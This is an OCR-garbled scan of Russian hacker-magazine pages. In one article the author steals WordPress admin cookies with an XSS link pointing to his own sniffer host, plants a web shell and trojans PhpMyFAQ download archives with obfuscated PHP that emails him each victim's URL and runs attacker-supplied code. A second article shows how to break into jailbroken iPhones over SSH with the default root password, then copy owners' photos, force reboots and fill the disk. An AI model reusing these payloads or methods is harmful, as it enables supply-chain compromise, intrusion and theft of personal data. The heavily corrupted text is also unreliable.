Думаю, не стоит объяснять, что они остро нуждаются в хакерской помощи, 
правда, сотрудничать с ними... ну очень нудно. Как минимум, требуется 
толстый интернет-канал, позволяющий прокачивать гигабайты свежих 
игр. Игровой сервер, расположенный где-то там, требует к себе очень 
бережного обращения. При подозрении в хакерстве на ІР-адрес выставля- 
ется бан, иногда захватывающий всю подсеть провайдера, а всякие прокси 
забанены уже давно. Вот и приходится пользоваться услугами разных 
провайдеров, привлекая кэтому занятию друзей со всего мира, устанавли- 
вая на ихкомпьютерах(пообоюдномусогласию)тоннельныепрокси. Весь 
интернет все равно не забанишь, но расходы... потраченное время... И все 
это — за какие-то 1 0к в месяц? А именно на такую сумму можно рассчиты- 
вать, работая на постоянной основе. 

В ХАКЕР В ЗАКОНЕ 

Вылезти из подполья и перевести свою хакерскую деятельность на ком- 
мерческие рельсы — вполне возможно. Заказы будут. И их будет много. И 
никакого криминала. Правда, после выполнения некоторых видов работ 
(вполне легальных в России) в США можно будет въехать только чучелом 
илитушкой. Это, пожалуй, единственный серьезный недостаток хакерской 
деятельности. Причем, совершенно невозможноузнать заранее, имеетли 
кто-то в Штатах на нас зуб или нет. Иногда хакеров хватают сразу при сходе 
с самолета и начинают предъявлять, даже если они сюда не хакерствовать 
приехали, а просто потусоваться на конференции. 

На этот случай... нет, адвокатов мы оставим голливудским боевиками, но 
запомним телефоны российских посольств. Туда следует первым делом 
звонить при задержании (в США, как известно, задержанному разрешается 
сделать один телефонный звонок и лучше звонить в посольство, чем до- 
машним, которых с перепугу может и Святой Кондратий хватить). Впрочем, 
здесь нетуниверсальных путей и нужно смотреть по ситуации. А ситуация 
такова — или хакерство, или Америка. Совместить эти две вещи без риска 
для здоровья — это нужно нереально крутым перцем быть. □□ 
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ИСТОРИЯ ПРОТРОЯНИВАНИЯ ПОПУЛЯРНОГО ДВИЖКА 



Как-то раз я наткнулся в Гугле на сайт Ьі:і:р://р]іртубац.сІе. Это официальная 
страница движка для создания факов — РЬрМуРац (по аналогии со скриптом 
менеджера БД РйрМуАсІтіп). Заинтересовавшись, я решил проверить рас- 
пространенность движка в инете. По запросу «рйртубац» поисковик выдал 
828 000 результатов! И тут мне пришла безумная идея: что, если взломать 
официальный сайт движка, а затем протроянить архивы с ЙірМуРац своим 
рйр-шеллом? 



В ПОИСКПУТЕЙ ПРОНИКНОВЕНИЯ 

Для справки: РЬрМуРад — это многофункциональная ѵѵеЬ-система РАО, 
написанная на РНР и использующая БД с поддержкой различных языков 
(втом числе и русского). При заходе на сайт в глаза сразуже бросается 
ссылка на беѵЫод разработчиков, на который я, собственно, и перешел. 
Блогработал на моей любимой платформе ѴѴогсІРгевв :) . Тут ты , наверняка, 
подумаешь: «Фу, вордпресс, его же может сломать даже ребенок!». Ничего 
подобного! Утверждение верно лишьдля старых версий. В новых, чтобы 
взломать блог, приходится изрядно повозиться. 

Итак, открыв Ніті-исходник главной страницы блога, я увидел 
жизнеутверждающую надпись: «<теВа пате= "депегаВог " 
сопВепВ= "ШогсІРгезз 2.3.3" />». На момент написания статьи это 
была одна из последних версий вордпресса. Полезных паблик-уязви- 



мостей для нее не существует, но на каждую дверь всегда найдется своя 
отмычка! Немного поразмыслив, я вспомнил о недавнем баге в квез Ыті- 
фильтрах (опенсорс-библиотека, используемая во многих скриптах, втом 
числе и вордпрессе). Ба г заключался в следующем: при проверке ссылок в 
комментариях (да и вообще, где угодно) кзез-фильтры некорректно обраба- 
тывают начало ссылки — протокол. По задумке разработчиков, кзез-фильтр 
пропуститтолько ссылки, начинающиеся с йввр: //, ГВр: //, шаіі : //. 
Так оно и будет работать, но не всегда :). Путем вставки в линкурлдеко- 
дированного символа %0В мы можем обойти это ограничение. То есть, 
при постинге комментария с содержимым: <а 1тгеГ= " %ОВзаѵазсгірВ : 
аІегВ (сІоситепВ . соокіе) " >С1іск 1іеге</а> (%0В здесь нужно 
пропустить через игісіесосіе ( ) ) натаргетной странице мы получим 
просто іаѵазсгірі-ссылку: 
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<а кгек= " з аѵазсгірк : аіегк (йосшпепк . соокіе 
Сііск кеге</а> 

Так что мне оставалосьтолько закодировать еѵіі-жаваскрипт, 
дабы избавить его от кавычек, поставить снифер на свой 
еѵіі-хост и придумать та кую ссылку, которую бы админы с 
удовольствием кликнули. 

Е ПЕРЕД ВЗЛОМОМ 

Ядовитая строка у меня получиласьтакая: 

міпйом. Іосакіоп . кгеТ= 1 кккр : / /туеѵіікюзк . сот/ 
зпік . рЬр?ій= 1 +йоситепк . соокіе; 

Здесь: ЬирѴ/туеѵіІЬозксот/зпіЕрЬрІіск — мой снифер, 
принимающий входящие кукисы через параметр ій. Его 
содержимое, скорее всего, тебе до боли знакомо: 

<?ркр 

$ій = $_СЕТ [ "Ій" ] I 

$іі1е = іореп ( ' Іод . кхк ' , ' а ' ) ; 

кшгіке ( $кі1е , $ій ); 

ісіозе ( $кі!е) ; 



На выходе получилась строка урл-кодированных символов, из 
которой я и составил свой мега-комментарий (%0В, конечно 
же, раскодировал перед постингом): 

Неір те! Му РкрМуРад іпзкаііакіоп йоез пок тлгогк 
соггескіу : ( 

<а кгек=" %0Вз аѵазсгірк :%77%б9%бе%64%бк%77%2е 
%6с%6к%63%61%74%69%6к%6е%2е%68%72%65%66%3й%2 
7%68%74%74%70%3а%2к%2к%6й%79%65%76%69%6с%68% 
6к%73%74%2е%63%6к%6й%2к%73%6е%69%66%2е%70%68 
%7 0%3 к%б9%б4%Зй%27%2Ь%б4%бк%63 %7 5%бй%65%бе%7 
4%2е%бЗ%бк%бк%бЬ%б9%65%ЗЬ" >ту кадйезс</а> 

И, как ни странно, отзывчивые разработчики «пхпмайфака» 
буквально на следующий день кликнули по моей ссылке. 

В ПРОНИКНОВЕНИЕ 

Проснувшись, я сразу полез на свой дедик проверять Іод. 1x1 и 
увидел в нем жизнеутверждающую строку: 

ѵ\гогс!ргеззизег_13 07522524сй4ЪЗ 6екЪЪ9978596й4 
5й7=зиррогк ; ѵ\гогс!ргеззразз_13 07 522 52 4сй4ЬЗ бе 



> Ипкз 

ѵѵѵѵѵѵ.зесигіІуЬсцз. 
сот/ агсЫѵе/1/490402 
— описание уязвимос- 
ти в кзез-фильтрах. 




> ѵѵагпіпд 

Маська! Будь моей 
женой! 

Маг 



?> 

<зсгірк>Ьізкогу . до ( -1 ) </зсгірк> 

Шйег&пЬзр ; сопзкгискіоп 

Полученные кукисы сразу же записываются в Іод . кхк, и 
серфер перенаправляется обратно на страницу блога. 

Далее было необходимо зашифровать мою ядовитую строку в игі- 
представление. Для этого я также набросал нехитрый скрипт: 

<?ркр 

$зкг2кех = игійесойе ( "^іпйоѵ^. Іосакіоп . 

1ігек= ' кккр : / /туеѵіікозк . сот/зпік . 
ркр?ій= ' +йоситепк . соокіе; " ) ; 

$гекигпзкг= ' ' ; 

ког ( $і=0 ; $і<зкг1еп ($зкг) ; $і++) 

{ 

ік($зкг[$і]=='&' ) 

{ 

$гекигпзкг .= " $зкг [ $і ] " ; 

} 

еізе 

{ 

$1іех=йес]тех (огй ( $зкг [ $і ] ) ) ; 



кЬЬ997 859бй45й7 = 0с9 0йс4Ь44й73 І4122 933 к2Ы7Ь 
кЗйЬ7 

Видимо, это были кукисы одного из админов блога :). 

Теперь мне оставалосьтолько вставить их в Оперу. Что я и сде- 
лал с помощью встроенного редактора кукисов (Инструменты 
^Дополнительно Соокіез). Зайдя в админку блога Ыір :// 
сІеѵЫод.рІіртуІад.сІе/ѵѵр-асІтіп . я убедился, что полученные 
кукисы были действительно админские, так как никакого 
урезания прав даже близко не наблюдалось. Отсюда я пошел 
в раздел управления плагинами иубедился, что админам 
вообще не знакомо понятие безопасности. Единственный 
плагин блога — Акізтеі (антиспам-плагин) — был открыт на 
запись (впоследствии выяснилось, что абсолютно все файлы 
на сервере доступны для записи), чем я немедленно и вос- 
пользовался, вставив в его код шелл собственного написания. 
Теперь он был доступен по адресу ЬйрУ/сІеѵЫод.рЬртѵІад .бе/ 
ѵѵр-асІтіп/?рора . Далее я стал искать дистрибутивы РЬрМуЕац 
для скачивания. Таковые нашлись на пару директорий выше в 
/йоѵтіоай. Последней стабильной версией движка 
был ркртукад-2 .0.7. гір. Его-то я и решил протроянить :). 
Для этой нехитрой цели я установил скрипт на свой локалхост 
и наобум взял один файл для опытов — . /іпс/кипскіопз . 




> ѵѵагпіпд 

Информация предо- 
ставляется исключи- 
тельно к размышле- 
нию. Никакая часть 
статьи не может быть 
использована во вред. 
В обратном случае ни 
автор, ни редакция 
не несут какой-либо 
ответственности за 
возможный ущерб, 
причиненный вашими 
действиями. 
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Архивы с дистрибутивами РЬрМуРац 



ріір. Теперь нужно было лишь придумать механизм, уведомляющий отом, 
что новая жертва устанавливает протрояненный дистрибутив себе на хост 
— и похитрее его замаскировать (и сам шелл, само собой]. Неплохо было 
бы сделать так, чтобы во время установки движка какой-нибудь служебный 
файл (пустой) записывался в /Стр, а на мое мыло приходил бы отчете ад- 
ресом жертвы. Файл в /Стр нужен был, чтобы мыло не приходило каждый 
раз, когда кто-нибудь зайдет на страницы скрипта :). 

И я взялся за программную реализацию. 

г кодинг 

Вышеизложенные идеи я уместил всего лишь в нескольких строчках кода: 

ІС ( ! із_Сі1е ( " /Стр/зезз_р1ір001 " ) ) { таіі ( "Мое_ті1о@ 
таіі.ги" , "Ыем зЪеІІ оТ РЬрМуЕад " . деСепѵ ( " ЗЕКѴЕК_ 

ЫАМЕ " ) . деСепѵ ( " ЗСВІРТ_ЫАМЕ " ) , деСепѵ («ЗЕКѴЕК_ 

ЫАМЕ») .деСепѵ ( " ЗСРІРТ_ЫАМЕ " )) ; } $Ср=Сореп ( " /Стр/ 
зезз_рЬр001 " , "ѵг" ) ; СриСз ( $Ср , 1 ) ; Сс1озе($Ср); 
іззеВ ( $_СЕТ [ѵіеѵтеъгезС] ) ? еѵаі (Сгіт ( зСгірзІазЬез ( $_ 
СЕТ [ѵіеѵтеѵгезС] ) ) ) : " " ; 

Объясняю: если файла /Стр/зезз_р1ір001 не существует, скрипт шлет 
мыло на мой адрес сурлом жертвы, затем создает файл /Стр/зезз_ 
рІірООІ. Если существует параметр $_СЕТ [ѵіеѵтехѵезС ] ,то он исполня- 
ется, как рЬр-код. Все гениальное просто :]. 

Теперь мой код необходимо было зашифровать. Я поступил с нимтак: 

1. Пропустил через Ъазе64_епсосіе ( ) ; 



2 . Перевел все полученные символы в с И г- представление 

$геСигпзСг= 1 1 ; 

Сог($і=0;$і<256;$і++) 

{ 

$агг [сЬг ( $і ) ] =$і ; 

} 

Сог ( $і=0 ; $і<зСг1еп ( $зСг ) ; $і++ ) 

{ 

$і ! = ( зСгІеп ( $зСг ) -1 ) ? $геСигпзСг .= $агг[зиЬзСг( 

$зСг , $і , 1) ] . ' , ' : $геСигпзСг .= 

$агг [зиЬзСг ( $зСг , $і , 1) ] ; 

} 

ргіпС $геСигпзСг; 

3. Сериализовал строку с помощью зегіаііге ( ) ; 

4 . Закодировал в урл-представление с помощьюигіепсосіе ( ) ; 

5. Случайным образом разбил строку в массив. 

В результате этих извращений получилось что-то вроде: 

аггау ( ' а%ЗА444%ЗА%7Ві%ЗА0%ЗВі%ЗАб8% ' , ' ЗВі%ЗА1%ЗВі%ЗА81 
%ЗВі%ЗА2%ЗВі%ЗА112%ЗВі%ЗАЗ%ЗВі%ЗА112% ' , 



'і%ЗА122%ЗВі%ЗА28%ЗВі%ЗА90%ЗВі%ЗА29%ЗВі%ЗА88%ЗВі%ЗАЗО% 
ЗВі%ЗА78%ЗВі * ) 



► 052 



ХАКЕР 08 /116/ 08 

























■ лІг4т-пкл ІКлпні ІЬіІЫдН-ІМІІіІіі І.Нвіі ІІ іі ичгіи ІЫігі і.-Ьіі ■■ гіі Іі иНІ і ■ 

8*1"“» ^ л| н || іі |< і№ '»-и^.і 1 •Чіі'-'і - іич^'і.і •іін | чі"м--' ’> '«імч ■ пи нн 

1 і:а-ііь і в _іі^ів-:^..-- іі -■■і:!- !. -.^ь-гіі ■!■'( ■■■.■ іьііі-іі а .■ іічі < ■■ -■^.ііііы > ..- і іііі 
ІЧЫ>А|и ! ІіЧІ№]ІІ№ЖЛИ|ІІІМ І^Р.НІІГПт“Іі-"ПІ ■ 

..ііміі.р. и%іщ и. ■■ ігміиііічаі^ішвіъдіілііііі.іріііііщі4іаыіі;и. ...ші_(ж|ріь,н-., і.в.вм . 
л - ■■-■■■•■.іпрі'г іі чиі ил ■ л ілііиіпіЪіімііѵііі 1 і'ті і.міппм чіпіін тч л ■■■■ і 

■ іЬІі гііі' ІІ пЫіі-ііЯіііі ІИ||аІ^И|Лі^КІІГНЦИ|іЫііЬ1І1ЫМ|П*МЬІМі іііліі! НМ-мвм н і 
м>аііігѵанзиитііаь.ип 1 -і -іі і 1 - и и- іі і— іЧі--чч- ;► ■чіі'і“' .."ілиі-і 

кй-мні.-ів-зма.гіі--:- іжііипн і іЧ>.-лі_ и». - 1 ■ ■ «іг,іі і- и. _ і* л.і>іг>- і-* і*’ +іезі іь_іч<-і. -ы 

!■■- "ЬіІ^ I ■ ■ - ІІНЧІЧіІ -^+- ІГ-і! ■! ■• Фі-ВІІ.Ь- і | , ■ ь иы ■ < 1 1 м I ! і ■ г- 1 <н РВ II і > 4 и зі м і- ■ і ь+ч- 1 ■ ■ > і к ! 

і - ■ т н 1 1 1 1 4* га г чвв т « ? іп ■ : *>- іш « г?і в і ■ и ч яг « і ртя- лш і ы ^ Ш п ■ і іся N1 ■ і ш и 

і вмі^ііініпм^і ■ іімаіна ■ г і ■ р -■■■■*■■■■«■ ■■■■ м ■)■ іііл-|>в| и півів рі ■( пі|іім фіа|інѵ 

■ I III -кН- Іи Івгі-.-Кі- .ьіві и- ІвШ ІЭи ІЫ ■ '■КЬ.ІІіііи-Іі'ііЯііІвІР-ЧЬі 1 ві|РіМ|ІІ|іВНРіі і 

■ ■ і I ■ 1 1 ■+ л іі" - ! ііі , імп іі чм 1 І-Яп Іиііі4 іііыЧ II м-ы «і ІЬі 

• им гРпвил- иіііяю- и-мыпіі іИііішь і п- и=м іііПівіі :і ли ль гын ірш>иіл! ч-.- і«г'- 

І!НШЖ|ШСНМІгі І ЧііаіпіШлІКИіП«ЧГ1ІПиівІ{ітіВ.І^ іІІі-ііиіІІЕІігІ^ШЬЛиЧІЯІЯЕЧЬІЧ^ЦІЫ і 
и'.«н івіі ,ч іч; міі" ч іяі ч" «и ! и рі а і «гѴірлчі 1 іипр^ЧіігіѵіІяіѵ 1 гітнтпічіЧ'Ч-г ■ 0 



■ ЫІІ-І 



■ІЧѴЧР 






■ ІЧІЬГТЪТПпШЧЧІВічКІ'НіКЛ-ЕА'К 



Троянский конь в ^ипсЬіопз.рЬр 



Ты смогбы расшифровать такое? :] Имхо, любой кодер просто забьет на 
такую строку, если вдруг случайно увидит ее. 

Затем последовали финальные штрихи. В файл кипскіопз . ркр, а 
именно — в кипскіоп тккз ( $сіакит=ка1зе ,$геік=ка1зе),я вставил 
следующий код, который расшифровывал и исполнял мою очередную еѵіі- 
строку: 

$с1еагшг1=аггау ( * а%ЗА444%ЗА%7Ві%ЗА0%ЗВі%ЗА68% ' , ' ЗВі%3 
А1%ЗВі%ЗА81%ЗВі%ЗА2%ЗВі%ЗА112%ЗВі%ЗАЗ%ЗВі%ЗАІ12% ' , 



' і%ЗА122 %ЗВі%ЗА2 8%ЗВі%ЗА9 0%ЗВі%ЗА2 9%ЗВі%ЗА88%ЗВі%ЗАЗ 0% 
ЗВі%ЗА78%ЗВі ' ) ; 

$с1еапзкгіпд = 1 ' ; 

Тог ( $і = 0 ; $і < соипк ( $с1еапиг1 ) ; $і + + ) 

{ 

$с1еапзкгіпд .= $с1еапиг1 [ $і] ; 

} 

$с1еапзкгіпд = ипзегіаііге (игісіесосіе ( $с1еапзкгіпд) ) ; 
$с1еапиг1 = ' ' ; 

Тог ($і = 0;$і < соипТ ( $с1еапзТгіпд) ; $і++ ) 

{ 

$с1еапиг1 .= скг ( $с1еапзкгіпд [ $і ] ) ; 

} 

еѵаі (Ъазе64_с1есо(1е ($с1еапиг1) ) ; 

Втомже скрипте я преднамеренно создал вызов функции ткТз ( ) . 

Н ЛЕВЕЛ КОМПЛИТ! 

Заново перепаковав архив рЬршуТад-2 .0.7. гір, я залил его в директо- 
рию сіоѵтіоасіз и изменил время модификации файла обратно на Мау 12 
08:41 командой коисЪ. -Т 200805120841.10 рЬртуТад-2 . 0 . 7 . гір. 
Оставалось поколдовать над соседним файлом рбртуі : ар-2.0.7.2Ір.тб5, 
который содержал тб5-хэш архива предыдущей непротрояненной 
версии скрипта в формате«2Т2Т51есі114ЬТ512е57Тс7 6Ь7есЬс13 9с 
*рЬршуТад-2 .0.7. гір». Новый хэш архива (с483 8 а9 4897(19 840 еа 
с197 050с6с1с1а4б], полученный с помощью встроенной в рбр функции 
тсіБТіІе ( ) , я и записал вместо старого! Не забыл изменить и время моди- 
фикации второго файла. После этой нехитрой операции протроянивания ко 




мне на мыло постоянно приходят ссылки на новые шеллы. Что, в общем-то, 
мне и требовалось. Атебе пожелаю быть очень внимательным с опенсорс- 
ными движками. Не я, так кто-нибудь другой сможет незаметно подсунуть 
тебетроянского коня в красивой обертке. Конец :). И-И 



Трояны внутри 

Те, кто установил протрояненный дистрибутив к себе на хост, понем- 
ногу стали подозревать что-то неладное. На официальном форуме 
движка Ьнр: //Іогит.рйртукад.сіе зачастую можно увидеть топики 
следующего содержания: 

Привет, моя версия рЬртукад, которую я скачал с 
вашего сайта, выдает следующий бред: 

Ѵ/агпіпд : шаі1() [ кипскіоп. таіі] : 8МТР зегѵег 
гезропзе: 550 <тое_ті1о@таі1 . ги> . . . Кесіріепк 
ипкпоѵт іп с!ігескогу\р]эртукад\іпс\кипскіопз . 
ркр (1504) : еѵаі ( ) ' сі сосіе оп 1 іпе 4 

Шагпіпд: кореп ( /ктр/зезз_р1ір001) [ кипскіоп . кореп] : 
каііесі ко ореп зкгеат: N 0 зисЪ. кііе ог сіігескогу 
іп сіігескогуХркртукадХ іпс\ кипскіопз .ркр (1504) : 
еѵаі ( ) ' сі сосіе оп Ііпе б 

Магпіпд: крикз() : зиррііесі агдитепк із пок а 
ѵаіісі зкгеат гезоигсе іп (Игескогу\р1іртукад\іпс\ 
кипскіопз . ркр (1504) : еѵаі ()' сі сосіе оп Ііпе 7 
Ѵ/агпіпд: ксіозе ( ) : зиррііесі агдитепк із пок а 
ѵаіісі зкгеат гезоигсе іп сіігескогу\р]зртукад\іпс\ 
кипскіопз .ркр ( 1504 ) : еѵаі ()' сі сосіе оп ііпе 8 
Ткапкз іп асіѵапсе . 

Мыло в этом сообщении выглядит подозрительно, что 
делать? 

Во избежание происков таких подозрительных личностей с вклю- 
ченным рЬр заіе-тосіе и кастрированным зепсітаіГомя убрал свой 
злонамеренный код из дистрибутива за номером 2.0.7 и вставил его 
по той же технологии в дистрибутив 1.6. Скачивают его меньше и, 
соответственно, реже замечают что-то неладное. Будь осторожен, если 
вдруг захочешь поставить себе РЬрМуРац версии 1.6! Хотя и насчет 
2.0 тоже не могу обещать, что в скором времени не вставлю туда что- 
нибудь нехорошее :) . 



ХАКЕР 08 /116/ 08 



► 053 



взлом 



» 





Атака 



ВЗЛОМ ТЕЛЕФОНОВ ОТ АРРЬЕ 
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Н ѴѴЕЮ0МЕТ0 0АКѴѴШ 

Многие относятся кіРЬопе какктелефонудля блондинок. Он, и правда, 
нравится блондинкам, но работает при этом под управлением абсолютно 
полноценной ІІпіх-операционки. Мобильная 05 X изготавливается из на- 
стольной Мае 05Х, которая, в свою очередь, является современной версией 
системы В50-семейства ЫеХТЗТЕР, увидевшей светза пять лет до ядра 
І_іпих — в 1986 году. 

Инженеры Арріе удалили из операционки ІРЬопе почти все консольные 
утилиты, однако при установке ОрепЗЗН на взломанный ІРЬопетребуется 
поставить еще и пакете В50-окружением, так что тебя встретит компания 
старыхдрузей: отсигі, вер и 2 вЬ доіаг, Ьгір2 и ди п ігр. 

Каки в любой Ыпіх-системе, в мобильной МасОЗХестьсуперпользова- 
тельс именем гооі и паролем, которым чаще всего поумолчанию является 
строка «аіріпе». 

Шесть букв в одном регистре — обычно плохая идея для пароля гооі, но в 
обычном, не взломанном, ІРЬопе вводить этот пароль некому и некуда. Он 
мог бы быть любым, и ничего бы не изменилось. 

В России, разумеется, все ІРЬопе взломаны, и на большинстве этих взло- 
ма иных телефонов установлен ОрепЗЗН — как единственный способ по- 
лучить доступ к файловой системе. Когда-то это было стандартным этапом 
взлома и активации. 



Таким образом, мы получаем оченьзабавную картину: почти клюбому 
айфону в России можно удаленно подключиться по ззЬ с дефолтовой за- 
писью гооКаІріпе и получить неограниченные возможности вуправлении. 
Заставить телефон звонить и отправлять 5М5 — легко. Украсть базу с 5М 5, 
записную книжку, фотографии — еще проще. Вообще, можно сделать все, 
что угодно. 

Н ОБНАРУЖЕНИЕ 

Практическую часть экспериментов мыначнемс этапа, который назы- 
вается «обнаружение». Ведь нужно знать, куда подключаться: к какому 
ір -адресу. Вообще говоря, у ІРЬопе два сетевых интерфейса: ѴѴІ-РІ 
(епО, согласно йсопЬд) и 6РР5 (РРР- интерфейс і р 1 , согласно тому же 
йсопйд]. Для взлома лучше взаимодействовать с телефоном по ѴѴі-РІ: 

6 РР5 пролегает по территории сотового провайдера и, к тому же, это 
очень медленный протокол. Междутем, времени для взлома обыч- 
но немного — ІРЬопе любит поспать, и в режиме ожидания (віапббу 
тобе) практически все процессы (твоя взЬ-сессия, запущенный тобой 
процесс, даже запланированные по сгоп процессы] ставятся на паузу 
и возобновляются только после того, как владелец достанет телефон 
из кармана и разбудит его. Батарейку это экономит, а нервы может 
подсадить. 
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Можно придумать схему со сканированием всего доступного 
ІР-диапазона какого-нибудь сотового провайдера или с 
регистрацией ІР-адресов пользователей М оЬі 1е5аба гі р за- 
шедших на специально заведенный сайт — но все это лучше 
отложить на скучные зимние вечера. Куда быстрее и веселее 
увидеть человека, задумчиво гладящего на экран своего 
телефона в офисе или кафе с открытой ѴѴІРІ-сетью. 

Обнаружить ІРЬопе с помощью птар — элементарно. Запусти 
сканирование стандартным образом (например, птар -О 
10 . 0 . 0 .*) иувидишьв списке прочиххостов воттакиезаписи: 

Бок зіюѵт: 1714 сіозесі рогСз 
РОЕТ 8 ТАТЕ 8ЕКѴІСЕ 
22/кср ореп ззЪ. 

МАС Асісігезз : XX : XX : XX : XX : XX : XX (Арріе) 
Беѵісе Суре: рТюпе I тесііа сіеѵісе 
Киппіпд: Арріе етЪесісІесІ 
ОЗ сіеСаіІз: Арріе іРТюпе тоЬіІе рЬопе ог 
іРоЫ ТоисЪ. аисііо ріауег (БагЫп 9.0. ОсЗ.1 ) 

Конечно, сканировать всю подсетьс ключом -0 — долго и 
утомительно. Правильнее было бы пройтись по ней без ключа 
-О и только потом определить ОС на хостах с открытым 22-ым 
портом. Но и это не самый рациональный способ. На взло- 
манном ІРЬопезапущен нетолько ззЬсІ, но и тОЫЗРеБропбег 
(Еегосопі от Арріе). То есть при входе в сеть ІРЬопе оповещает 
всех присутствующих отом, какие сервисы он предоставляет. 
Достаточно запустить, к примеру, 5РТР-клиентс поддержкой 
Вощоиг (допустим, СуЬегЬиск под Мае 05Х), ион известиттебя 
о появлении нового хоста в сети. Более того, тБЫЗРеБропбег 
доступен в виде исходников, портирован на Ыпих и на ѴѴІпбоѵѵз, 
и его легко использовать для автоматизации процесса поиска и 
проверки всех появившихся в сети телефонов. 

Н ЕЩЕ О СИСТЕМЕ 

В мобильной ОЗХдва пользователя (не считая поЬосіу и 
ипкпоѵт): гоок (этоты) ишоЫІе (это владелецтелефона). 
Файловая система телефона разделена на две части. Папка 
/ѵаг /тоЬіІе, содержащая данные пользователя, отделена 
отостальной системы (сделано для того, чтобы после обнов- 
ления прошивки не нужно было заново заливать на ІРЬопе 
адресную книгу, музыку и так далее). 

Как в любой приличной II N1X00, в 05 X все — л ибо файл, либо 
папка. Самые важныедлятебя папки — ЫЬгагу (в ниххранятся 
персональные данные и настройки) и Месііа (в ниххранятся 
картинки, музыка и видео). В корне файловой системы (помимо 
стандартных екс,изг,с1еѵ и т.д) ты найдешь папки ЗузБеш, 
ЫЬгагу и АррІісаБіопз. Внутри папки ЗузБеш находится 
еще одна папка ЫЬгагу. Другая папка ЫЬгагу прина- 
длежит пользователю тоЬіІе (/ѵаг/тоЫІе/ЫЬгагу). В 
настольной Мае 05Х положение папки ЫЬгагу определяет ее 
значимость — в /Зузкет/ЫЪгагу свои данныехранятсис- 
темные приложения, в /ЫЬгагу хранятся данные пользова- 
тельских приложений, общие для всей системы, а в -/ЫЬгагу 
— личныеданные пользователя. То же относится и кмобильной 
05Х. Поэтому большинство интересных вещей (настройки, 
базызітіБи почтовые базы) ты найдешь в папке /ѵаг/шоЫІе/ 
ЫЬгагу/, а ключи доверенных ѴѴіРІ-сетей — в /ЫЬгагу. 
Итак.теперьты знаешь, где искать полезные данные, но как 
они выглядят? Данные в мобильной 05 X могут лежать внавал- 
ку, храниться в файлах .ріізі или базах50Ыіе. 

г ВНАВАЛКУ 

Хотя параноики из Арріе предпочитаютзаписывать все в 
отдельные базы данных, кое-что валяется на диске ІРЬопе 
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Новая настройка сразу в силе. Правда, рингтона стаким 
названием не существует 



просто так. Например, сделанные встроенной камерой снимки 
лежат в /ѵаг/тоЫІе/МеЬіа/БСіМ. Если хочешь их быстро 
украсть (надежда на домашнее порно жива и будетжить всег- 
да) — воспользуйся утилитой зер: 

зер -г гоок@іРЪ.опе . Іосаі . : /ѵаг/шоЫІе/МеЬіа/ 

БСІМ 

Человек подарил тебе надежду на домашнее порно — подари 
ему что-нибудь взамен, сделай его жизнь немножечко лучше. 
Картинка, которую он использует в качестве фона, хранится 
в файле /ѵаг/тоЫІе/ЫЬгагу/ЬоскВаскдгоипсІ . 
брд. Неважно, выбрана ли она системных картинок, залита 
с компьютера или снята встроенной камерой — она будет 
скопирована в это место и уменьшена до 320x480 пикселей. 
Размер важен — если картинка будет больше или меньше, она 
не будет масштабироваться. 

В жизни каждого должна быть минутка для д оаізе . 
Скопируй заранее подготовленную картину на место 
указанной (например, сигі Ыкр : //доакзе . сх/Ье11о . 
брд -о /ѵаг/тоЬіІе/ЫЬгагу/БоскВаскдгоипсІ. зрд), 
закрепи (чтобы растянуть удовольствие): сЬшоЬ -ѵг /ѵаг/ 
шоЫ 1е /ЫЬгагу /БоскВаскдгоипЬ. зрд и перезапусти 
5ргіпдВоагб (кіііаіі ЗргіпдВоагЬ). Теперь владелец 
ІРЬопе будет постоянно видеть (без вариантов!) одну из 
старейших реликвий интернета. 

Настройки мобильной 05Х — яркость, мелодия звонка, время 
срабатывания будильников и прочее — хранятся, как и в 
настольной Мае 05Х, в файлах рІізЬ Файлы ріізі бываютдвух 
видов —текстовые и бинарные. Текстовые, разумеется, можно 
править любым текстовым редактором (это простой, легко 
читаемый ХМІ_); бинарные надо конвертировать в текстовые, 
а потом обратно. В мобильной 05 X используются оба типа 



^ взлом 




Картинка из шапки 
хакер, ги — достойное 
украшение любого 
стола 




Сообщение о пере- 
полнении дискового 
пространства, которое 
будет донимать 
хозяина атакованного 
айфона 




> ѵѵагпіпд 



• Одинаковый пароль 
поумолчанию — 

не дыра в безопас- 
ности мобильной 
05 X, а небрежность 
пользователя, 
которому полагается 
знать, что он делает. 
Но это не значит, что 
05Х неуязвима. Уяз- 
вимость в браузере 
ІРЬопеуже использо- 
вали для разлочки. 

• Если хочешь пос- 
тавитьдело на поток, 
обрати внимание 

на одну из функций 
РѵѵпадеТооІ, прило- 
жения для взлома 
и разлочки ІРЬопе 
( ірЬѵѵп.огд ) — муль- 
тибут. Ты сможешь 
поставить прошивки 
версий 1.1 .2, 1.1.4 
и 2.0 боко бок и пере- 
загружаться из одной 
в другую. 
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Команда тОЫ5 обнаруживает в сети хосты, 
рекламирующиеуказанные сервисы по Воприг. 
Хосте именем ѴѴопа — это ІРЬопе с работающим 
0реп55Н 




ОЗХсчитываетвсе изменения настроек 
автоматически, достаточно заменить 
рііві-файл 



— системные настройки хранятся втекстовом виде, пользова- 
тельские — в бинарном. 

Конвертируются плисты с помощью утилиты ріиоіі. 



Простое западло 

На закуску — два простых рецепта. 

1 . Если хочешь, чтобы вражеский айфон перезагружался раз в пять минут — просто 
набери сгоШаЪ -е и добавь в стоп одну строку: */5 * * * геЪооЕ 

2. Неплохая идея — занять все свободные на айфоне гигабайты. Сделать это легко: 

сак /сіеѵ/гапсіот > ЬаЬадоксЬа . кхк 

Бешеные гигабайты быстро кончатся, и ІРЬопе будет настойчиво предлагать 
своему владельцу удалить пару фотографий и немного музыки, чтобы расчистить 
место. 




> \піо 

• Зргіпд ВоагсІ — до- 
машний экран ІРЬопе, 
приложение, которое 
показывает иконки 
других приложений. 
Оно исполняетте же 
функции, что и Ооск 

в настольной Мае 
05 X. Все запущен- 
ные пользовате- 
лем приложения 
— дочерние процессы 
ЗргіпдВоагсІ. 

• Чем большеты най- 
дешь уязвимостей, тем 
большеутебя шансов 
получить работу 
вАррІе: прямосейчас 
на арріе.сот/іобз висит 
вакансия эксперта по 
безопасности ІРЬопе. 



Если ты пользуешься Мас05Х,онаутебя уже есть, если 
нет — скачай. Существуют версии и для Ы п их, идля 
ѴѴІпсІоѵѵв. Команда ріиоіі -сопѵегС преобразует файл 
из бинарного в текстовый и обратно; послеріикіі - 
сопѵегк хтіі ты сможешь править файл, после ріиоіі 
-сопѵегк Ьіпагуі — скопировать его обратно. Еще 
лучше пропихнуть на ІРЬопе собранную Эрикой Садун 
версию ріидіі для мобил ьной 05 X — она может исправ- 
лять различные параметры прямо из командной строки, 
без конвертации. 

Например, в файле /ѵаг/тоЪіІе/ЬіЪгагу/Ргебепсез/ 
